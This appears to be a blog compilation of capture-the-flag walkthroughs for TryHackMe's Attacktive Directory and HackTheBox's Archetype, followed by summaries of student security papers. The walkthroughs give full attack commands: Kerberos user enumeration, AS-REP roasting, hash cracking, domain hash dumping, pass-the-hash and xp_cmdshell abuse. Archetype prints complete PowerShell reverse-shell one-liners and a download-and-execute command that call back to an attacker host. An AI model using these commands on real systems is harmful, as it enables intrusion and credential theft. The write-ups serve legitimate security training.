After the repo is cloned, you will notice several install related files, requirements.txt, and setup.py. A commonly skipped file during the installation is setup.py, this actually installs Impacket onto your system so you can use it and not have to worry about any dependencies.

To install the Python requirements for Impacket:

pip3 install -r /opt/impacket/requirements.txt

Once the requirements have finished installing, we can then run the python setup to install the script:

cd /opt/impacket/
sudo python3 setup.py install

Installing Bloodhound and Neo4j:

You can install it with the following command:

apt install bloodhound neo4j

Task 3 - Enumeration (DC Enumeration Pt.1)

This task consists of gathering information about the domain controller of the target machine. However, before we start enumerating, let's have a look at AD related services.

Background to AD-Related Ports

Active Directory communications involve a number of ports, some of which are more familiar to network and security administrators than others. These were outlined in the Active Directory Replication over Firewalls article by Steve Riley:

• RPC endpoint mapper: port 135 TCP, UDP
• NetBIOS name service: port 137 TCP, UDP
• NetBIOS datagram service: port 138 UDP
• NetBIOS session service: port 139 TCP
• SMB over IP (Microsoft-DS): port 445 TCP, UDP
• LDAP: port 389 TCP, UDP
• LDAP over SSL: port 636 TCP
• Global catalog LDAP: port 3268 TCP
• Global catalog LDAP over SSL: port 3269 TCP
• Kerberos: port 88 TCP, UDP
• DNS: port 53 TCP, UDP
• WINS resolution: port 1512 TCP, UDP
• WINS replication: 42 TCP, UDP
• RPC: Dynamically-assigned ports TCP, unless restricted

For a full listing of AD-related services, see Microsoft's support article 832017 Service Overview and Network Port Requirements for the Windows Server System.

As always, let’s start with the Nmap scan to gather information on our target.

nmap -sC -sV -oA nmap.attactive-open-ports 10.10.xxx.xxx

-sV	: Service fingerprinting
-sC	: Launch default NSE nmap scripts
-oA : Output <filename>

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 23:28 EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.32s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-11 03:28:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-08-11T03:28:43+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-08-10T03:13:56
|_Not valid after:  2022-02-09T03:13:56
|_ssl-date: 2021-08-11T03:28:53+00:00; +1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-08-11T03:28:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.40 seconds

I counted 11, but apparently, this was incorrect. To double-check, I added | grep open at the end of my Nmap command.

nmap -sC -sV -oA nmap.attactive-open-ports 10.10.xxx.xxx | grep open

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-11 03:49:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Out of the 13 ports showing, 9 of them are known ports associated with Active Directory. Now, Let’s answer the questions. 🔍

• Port 139, SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
• Port 445, Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

SMB is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.

#useful command 
nmap -sC -p 139,445 -sV 10.10.xxx.xxx

Here is the output 👇

Also, we can use a well-known tool called enum4linux to enumerate 139/445 ports. Whenever ports 139 and 445 are open, I always start by using enum4linux to enumerate. To do so, we run:

enum4linux <ip> 2>/dev/null > attacktive-dir.e4l
        OR
enum4linux -a <ip>

2>/dev/null      -> Don’t show errors
> attacktive.e4l -> Write output to file
-a               -> Do all simple enumeration (-U -S -G -P -r -o -n -i).

It will return lots of information, including the NetBIOS Domain Name.

Here is the output 👇

Our Nmap scan previously revealed the Domain Name being spookysec.local

.local is often miss-used as a .TLD (Top Level Domain)

What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local

Task 4 - Enumerating Users via Kerberos (DC Enumeration Pt. 2)

From the previous tasks, we gathered hostname, domain name, ports and its services. As this room is about Active Directory challenges, so we concentrate on related ports/services. Like Kerberos.

Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography.
source: MIT

A whole host of other services are running, including Kerberos. As we discussed, Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray! Kerberos port is open on the target machine (Port 88). We can try further enumeration with Kerbrute from now on.

Installing Kerbrute:

Download the file here Releases - ropnop/kerbrute -GitHub

Open a terminal and make the file executable by typing

chmod +x <filename>

You can rename the file to kerbrute for easy use. Copy the file in your /opt directory by typing in

mkdir /opt/kerbrute
cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute

Now you can always find it in your /opt directory.

Now download the user list and password list by typing in the following:

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Now, Let’s answer the questions. 🔍

Kerbrute has a parameter userenum to enumerate valid usernames. We can run the following commands to get some information from kerbrute.

/opt/kerbrute/kerbrute -h

Here is the output 👇

There are few things to do before we run into Kerbrute user enumeration. The first is to add spookysec.local to our hosts file. When attacking the active directory I always put the domain in my hosts file.
Let’s put this in our /etc/hosts file since we are practising on a local network:

sudo nano /etc/hosts

To enumerate valid usernames from the userlist.txt provided to us, we can run the following command:

/opt/kerbrute/kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt

--dc string         -> The location of the Domain Controller (KDC)to target. 
-d, --domain string -> The full domain to use.
-t, --threads int   -> Threads to use 

Here is the output 👇

As you can see, there few valid usernames are available on the target domain. Out of all, 3 domain usernames interests us, and surely we will use these domain usernames in further tasks.

• svc-admin@spookysec.local
• backup@spookysec.local
• administrator@spookysec.local

What command within Kerbrute will allow us to enumerate valid usernames?
userenum
What notable account is discovered? (These should jump out at you)
svc-admin
What is the other notable account is discovered? (These should jump out at you)
backup

Task 5 - Exploitation Abusing Kerberos

With all the Information we have collected so far, using that we can exploit the Kerberos feature called ASREPRoasting.

AS-REP Roasting is an attack against Kerberos for user accounts that do not require pre-authentication. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. This attack is explained nicely in this article.

We can use Impacket's GetNPUsers.py script to do some ASREPRoasting to determine if there’s an account we can query Kerberos tickets from without a password. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

Now let's get the ticket. 🤠

cd /opt/impacket/examples
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass

Great, we have the following result:

Let’s try this out with the other valid users we validated earlier:

python3 GetNPUsers.py spookysec.local/ -usersfile <file_dir>

As you can see from the result, we got hash from one domain account, which does not require Kerberos pre-authentication. It means that except for svc-admin, other users does not seem vulnerable, or it is disabled.  We need to save this hash in a text file for cracking purposes. So, let’s save the valid hash to a file called “hash.txt”. This hash value we can attempt to crack using the passwordlist they provided in the challenge.

We can search generic hash types for the first part of the string (krb5asrep). It will reveal to us that the hash has the following type:

• Hash mode: 18200
• Hash name: Kerberos 5, etype 23, AS-REP

Cracking the Hash

Now, we crack this hash either using the hashcat application or John the ripper tool.

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking.

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including for: user passwords of Unix flavors (Linux, *BSD, Solaris, AIX, QNX, etc.), macOS, Windows, "web apps" (e.g., WordPress), groupware (e.g., Notes/Domino), and database servers (SQL, LDAP, etc.); network traffic captures (Windows network authentication, WiFi WPA-PSK, etc.); encrypted private keys (SSH, GnuPG, cryptocurrency wallets, etc.), filesystems and disks (macOS .dmg files and "sparse bundles", Windows BitLocker, etc.), archives (ZIP, RAR, 7z), and document files (PDF, Microsoft Office's, etc.)

hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force
-a    -> attack-mode
-m    -> 18200 specifies the mode we want to use.
			OR
sudo john --wordlist=passwordlist.txt hash.txt
(Here I am using John the Ripper)

Here is the output 👇

Now, Let’s answer the questions. 🔍

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-amin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23
What mode is the hash?
18200
Now crack the hash with the modified password list provided, what is the user accounts password?
ma____05

Task 6 - Enumeration Back to the Basics (DC Enumeration Pt. 3)

In the previous task, we cracked the password for a specific domain user. Now we use these user credentials to enumerate further. For that, let's look at the shares that we can access with the user credential on the domain controller. To do this, we can use the smbclient tool.

smbclient -L spookysec.local -U 'svc-admin'  
                OR
smbclient -L 10.10.xx.xx -U 'svc-admin'  
-U         -> Username
-L|--list  -> This option allows you to look at what services are available on a server.

Here is the output 👇

So, let's discuss what we are trying to do here exactly. We are querying the target IP address with a recently collected username to find SMB shares. If any share is accessible, then look into them for any information. Probably, it might be flags or passwords or something like that. 🙂

There are 6 shares available! Among them, the share backup seems interesting. Let’s explore this. 🤠

smbclient //10.10.xxx.xxx/backup -U 'svc-admin'

Here is the output 👇

So, there’s a file and it has encoded credentials for one of the accounts. Now we need to decode it. It looks like it is encoded with base64. Let’s decode this by running the below command.

base64 --decode backup_credentials.txt

Here is the output 👇

Now, Let’s answer the questions. 🔍

What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
What is the content of the file?
Ym_________________
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:ba___________

Task 7 - Domain Privilege Escalation | Elevating Privileges within the Domain

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account "backup" gets us thinking. What is this the backup account to? 🤔

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.

Knowing this, We are going to use another tool from Impacket's Library, called SecretsDump.py.

SecretsDump.py — It performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. The script initiates the services required for its working if they are not available (e.g. Remote Registry, even if it is disabled). After the work is done, things are restored to the original state.

cd /opt/impacket/examples
secretsdump.py -h 
-h, --help -> Show this help message and exit
 -just-dc  -> Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)

sudo secretsdump.py spookysec.local/backup:FOUNDPASSWORDHERE@10.10.xxx.xxx -just-dc-user Administrator
                   OR
sudo secretsdump.py -just-dc backup@10.10.xxx.xxx

As you can see from the above command, we have to run this using sudo and flag, as well as the domain account name which we previously collected from smbshare. Upon execution, first, it will ask for your Kali Linux password (sudo) and next, it will ask you to enter the target domain account password.

Here is the output 👇

As you can see, we dumped hashes for all the available accounts from the target machine. It was possible because the account that we used to dump has unique permission that allows all Active Directory changes to be synced with this user account. It includes password hashes.

So, now we have the hash of the admin account of the domain controller, now can crack the hash to get the password, or we can use the "pass the hash" technique to access the machine using the Evil-WinRM application. Apart from that, we can also use another Impacket's psexec.py tool to use the Administrator's full hash and create a shell.

Let's do this using the Evil-WinRM application. Type the following command to install it.

Evil WinRM is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

sudo gem install evil-winrm

#After installation type:
evil-winrm
-H, --hash      -> HASH NTHash
-i, --ip IP     -> Remote host IP or hostname
-u, --user USER -> Username 

Now, Let’s answer the questions. 🔍

What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
xxxxxxxxxxxxxxxxxxxx
What method of attack could allow us to authenticate as the user without the password?
Pass The Hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-H

Task 8 - Getting the flags

At this stage, we can use the Evil-WinRM or Impacket's psexec.py tool to get the shell/cmd of the target machine bypassing the hash.

evil-winrm -i 10.10.xxx.xxx -u Administrator -H TheFoundHash
#TheFoundHash -> 0e***********************fc

Here is the output 👇

Now we are logged in as the Administrator. We can find each flag in the user’s Desktop directory. 😈

cd ../../Administrator/Desktop
dir
cat root.txt
cd ../../svc-admin/Desktop
dir
cat user.txt.txt
cd ../../backup/Desktop
dir
cat PrivEsc.txt

Here is the output 👇

Okay... I’ll see you on the next room! 🙋‍♂️

Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️

References:
Active Directory Replication over Firewalls | Microsoft
Kerberos: The Network Authentication Protocol | MIT
Active Directory Ports | InfoSec Handlers Diary Blog
Active Directory - Definition | Tech Terms

Before start, I'm going to assume the reader already has a HackTheBox account & at least some sort of familiarity with various cybersecurity topics. But don't worry, I will try to cover every fundamental aspect of cybersecurity concerns associated with the Archetype box. 🙂

Here I will begin with the Archetype machine, the first machine of the "Starting Point" machine series offered by HackTheBox.

Basically, it is a series of 9 machines rated as "Very Easy" and should be rooted in a sequence. It’s a good starting point to learn the basics of CTF and some knowledge about SMB, Linux and Windows, by the way. Here you can see my process of learning how to solve this box.

HackTheBox (HTB) will provide you with official walkthroughs for each of the 9 machines. So from my perspective, it's fine to read each and every walkthrough provided by HTB and others to understand and learn new things by yourself. "Walkthroughs are the teachers" by the way.

Enough talks 🥱, let's get started to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

00. Configure the VPN ...

Log in to hack the box. Please navigate to the top-right of the website and, you'll see the "connect to HTB" tab. Do the configuration as you prefer, or else keep the defaults as it is.
Download the .ovpn file from Starting Point menu.

To begin, let's create our OpenVPN session.

sudo openvpn starting_point_ACCOUNTNAME.ovpn

After running this command, you'll get an output like below. It means that you have successfully connected to HTB through the VPN connection. You can verify it by navigating to the HTB account as well.

Now once connected, let's find out our new VPN interface. For that, run the "ip a" command on the terminal.

We can see that our "tun0" interface is our current VPN interface directly connecting us to Starting Point server. However, we have to perform either range-based Nmap scans or some OSINT (open-source intelligence) to find the IP address of a targeted machine/network in the real-world scenario.

01. Start the Machine ...

To start the machine, Just click on "Join Machine".

Then you can see the IP address of that machine. 🤠

Before continuing to enumerate steps, it's best practice to ensure the VPN is connected and the machine is alive by issuing some "ping" requests toward the IP address of our target machine. Because sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases, ping requests will be a success! 🙂

As ping result represents, it's TTL=127. Then the hop is 1. So it's definitely a Windows machine. It means there is one route between the machine and us (VPN).

To check the hop count of IP 10.10.10.27, you can use the following command. 😉

traceroute 10.10.10.27

In general, routers do not just set the TTL to whatever they want. They usually decrement the TTL by 1. A host sets a TTL at a reasonable number that should be the most hops a packet would ever take to another host, and at every hop, the TTL decrements by 1. When a packet expires on a routing platform because its TTL reaches 0, it is required to send an “ICMP TTL Exceeded message” back to the sender. The reason for the TTL is to prevent infinite loops caused by bad routing.

Default TTL values of different OS

• TTL = 64 : Unix/ Linux
• TTL = 128 : Windows
• TTL = 254 : Solaris/ AIX

02. Let's start with enumeration first...

02.1 Run Nmap Scan

First, we need to check the open ports on this machine. We can use the Nmap scripting engine to do a check for these. I use the command nmap -sC -sV -oA nmap.archetype 10.10.10.27, and I got quite a few ports open!

nmap -sC -sV -oA nmap.archetype 10.10.10.27

-sV	: Service fingerprinting
-sC	: Launch default NSE nmap scripts
-oA : Output <filename>

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 02:02 EDT
Nmap scan report for 10.10.10.27
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-15T04:06:19
|_Not valid after:  2051-07-15T04:06:19
|_ssl-date: 2021-07-15T06:27:32+00:00; +23m39s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h47m40s, deviation: 3h07m51s, median: 23m39s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype                                                                                         
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-14T23:27:19-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-15T06:27:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.73 seconds

Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has SMB (1433) port open. And let's enumerate further. Remember enumerating is the key! 🔑

02.2 List available shares

Further, we can notice that ports 445 and 1433 are open and, they are associated with file sharing (SMB) and Microsoft SQL Server. Since files usually store configuration files containing passwords or other sensitive information, so let's give it a try to check that! Here I've used smbclient to list out available shares as an anonymous user.

sudo smbclient -N -L 10.10.10.27

-N	: Don't ask for a password
-L	: Get a list of shares available on a host

Here is output 👇

Look what we got here! Yeah, that's something interesting, right? It seems like there is a share called 'backups' that is accessible with no passwords. So let's try to access it and see what's inside.😎😋

smbclient -N \\\\10.10.10.27\\backups\\

So now we are ended up with the SMB shell and, there is a file called prod.dtsConfig. So let's download it.

smb: \> dir								: List all directories
smb: \> get		<file-name> : Download file
smb: \> more	<file-name> : View the text file

Now we can open prod.dtsConfig file and yeah that ‘prod.dtsConfig’ file contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc 🥂.

03. Lets get Foothold...

Now we have credentials, Let’s try connecting to the SQL Server using Impacket’s mssqlclient.py

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library. source: https://github.com/SecureAuthCorp/impacket

03.1 Download and use mssqlclient.py

First, we need to simply wget and download the mssqlclient.py script.

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py

And then run the script and check whether we are working as a sysadmin (privileged user) or not.

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

Note: To run the above python script successfully, you need to install the latest "Impacket" version on your Kali machine.

Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.

According to the return value (1 = login is a member of the role.) yes we have the highest privileges.😁
This will allow us to enable xp_cmdshell and gain RCE on the host.

Check below awesome blog posts to understand that trick.

• Pentesting MSSQL - Microsoft SQL Server https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
• MySQL Information Gathering https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql

03.2 Usage of  xp_cmdshell

Now, we can get to the xp_cmdshell, by running the below commands.

EXEC sp_configure 'Show Advanced Options', 1; 
reconfigure; 
sp_configure; 
EXEC sp_configure 'xp_cmdshell', 1 
reconfigure;
xp_cmdshell "whoami"
xp_cmdshell "systeminfo"

The whoami command output trigger that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc.

The system info command will give us a long list of interesting information related to the particular system.

However, now we can run system commands using xp_cmdshell So, why can't we get a proper shell? 🤠

Hmmmmm...Ah! what a nice smell for PowerShell Reverse Shell huh! 😍

You can get some idea about reverse shells from below links,

• Reverse Shell Generator https://www.revshells.com

• Nishang framework https://github.com/samratashok/nishang

• TCP port communications with PowerShell https://livebook.manning.com/book/powershell-deep-dives/chapter-4

But personally, I like to use Nishang's Invoke-PowerShellTcpOneLine.ps1 to create my rev-shell.

After deleting all comments and unwanted things, the PowerShell script will be like this. 👇

$client = New-Object System.Net.Sockets.TCPClient('YourIP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('YourIP',443)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Remember; Type ifconfig tun0 and replace YourIP

03.3 Get Reverse Shell

Now, it's time to get a reverse shell. Save above PowerShell script as anyname.ps1 (here, I saved it as Invoke-PowerShellTcpOneLine.ps1)

Now we need to ensure this Powershell script is executable. Open a new terminal window, then run the following command:

sudo chmod +x Invoke-PowerShellTcpOneLine.ps1

Let's now set up a local web page to "share" this script with our target. Also, we need to set up a netcat listener. First, run the following python command within the same directory where the Powershell script is located.

sudo python3 -m http.server 80

To listen the connection, I always use the swiss army knife (netcat) tool. Personally, I do not like to get shell through multi handler (Metasploit). Trust me using the netcat tool you can learn a lot of things beyond metasploit. 👽

In another terminal window:

sudo nc -lvnp 443

After all of this is set up, let's first set a firewall rule to allow callbacks from 10.10.10.27 to our machine via ports 80 & 443 (you can specify any port you are using for the creation of your reverse TCP shell).

For this lab, I decided to install & use ufw (Uncomplicated Firewall) for my firewall.

sudo apt install -y ufw
sudo ufw enable
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
sudo ufw status numbered

After configuring the ufw, here is a snippet of the result:

Let's verify we have a local web page running by opening up your web browser & typing localhost:80 in the URL search bar.

04. Exploit the target …

With everything set, let's run the following command on the SQL server to download our backdoor & create our reverse TCP shell:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://YourIP/Invoke-PowerShellTcpOneLine.ps1\");""

Remember to replace the YourIP field accordingly.

It should run successfully. The output from our python http server that runs our python webpage should show an HTML 200 response code, showing a successful download of our Powershell script.

We can see our foothold on the netcat terminal window.

I divided up my terminal into 3 parts.

Woooh!!! We got our shell. 💀 A shell is received as sql_svc.

Now that we are in the target windows system, let's go to the User directory and go inside the sql_svc user's directory. We'll see if we can find the first flag.

Hint: To see the contents of a text file via a Window's command prompt, just use the "type" command.

Hopefully, you have acquired the first flag! 🤠

05. Privilege Escalation …

Now we need to escalate to Administrative privileges on our target Windows-based machine. To escalate privileges, we can run different tools.  Before running any tool, there are some steps that you need to run to enumerate some information, by the way. I will be showing you one by one in each walkthrough.

Did you remember? now we are in a service account called sql_svc. It's good practice to check recently accessed files/executed commands (Keep in mind as good practice).  Mostly (default) our console history will be saved in

C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. Now you understand what our next step is.

Right, Let's check above file using type command. 🙂

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Here is the output 👇

Oh no, no, no, no... You see? Just like that, we have found the credentials for the user administrator.

The backup share is mapped with admin credentials. Now to "root" this machine, we will use another useful exploit script from SecureAuthCorp.
Remember if you saw something like this. Ready to launch Impacket's psexec.py script.

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27

Here is the output 👇

Finally, we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.
So to find the last flag, simply repeat the process for our previous sql_svc user.

Eventually, if you want to delete the rules we made in firewall settings, you can run the following commands.

sudo ufw status numbered
sudo ufw delete [rule number you want to delete] 

Okay... I’ll see you on the next box! Oopsie 🙋‍♂️

Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️

This is an individual assignment that I did under the Secure Software Systems module when I was in the 3rd year 1st semester. This research paper is about Petya Ransomware. It will help anyone to get an understanding of what Petya Ransomware means.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu

Academia.edu is a place to share and follow research.

Academia.edu- |

Petya Ransomware Attack Critical Analysis Detection and Prevention

Ransomware has been growing worldwide since its first appearance in 1989 [1]. The destructive impacts of ransomware have continued to evolve over the past two decades significantly [2]. Petya is another critical ransomware that shifted from just

Academia.eduR. A. Shehan Sanjula

This is an individual assignment that I did under the Applied Information Assurance module when I was in the 3rd year 1st semester. The study will discuss the critical infrastructure security of the healthcare industry, and threats to healthcare infrastructure and various techniques that can use to prevent happening cyberattacks and how to apply them to the IoT [Internet of Things] based health care sector. The study also focuses on Encryption standards used in the health care sector to defend its infrastructure from cyber threats.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu

Academia.edu is a place to share and follow research.

Academia.edu- |

Critical Infrastructure Security in the Healthcare Sector

All critical infrastructures around the globe have become an increasing target of cyberattacks day by day. These cyberattacks are significantly concerning the healthcare sector as their primary target [1,2]. The last few years have seen the

Academia.eduR. A. Shehan Sanjula

This is an individual assignment that I did under the Introduction to cybersecurity module when I was in the 2nd year 1st semester. This report reviews the influence of Artificial Intelligence (AI) on cyber security processes. For example, artificial intelligence is consist of a bunch of practices that are covering machine learning, deep learning, neural networks, natural language processing amidst other variants. Machines can demonstrate Artificial Intelligence as their primary Intelligence. AI can be designated if a system identifies its background and decides relevant procedures to gain success in the relevant field.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu

Academia.edu is a place to share and follow research.

Academia.edu- |

In our day to day lives, Artificial intelligence effectively keeps its growth rate high by transforming the duties of humans of society. At present, the most powerful companies utilize the ability of artificial intelligence on behalf of improving their productivity for a better marketplace. As we know, this sort of technology is rising suddenly. Hence, the growth of cybercrimes which are also associated with cyber security is also rising compared to the positive improvements. So, cyber systems are much exposed to several kinds of abnormal behaviours and threats. Read more...👇

The Influence of Artificial Intelligence on Cyber Security

This report reviews the influence of Artificial Intelligence (AI) on cyber security processes. For example, artificial intelligence consists of a bunch of practices that are covering machine learning, deep learning, neural networks, natural language

Academia.eduR. A. Shehan Sanjula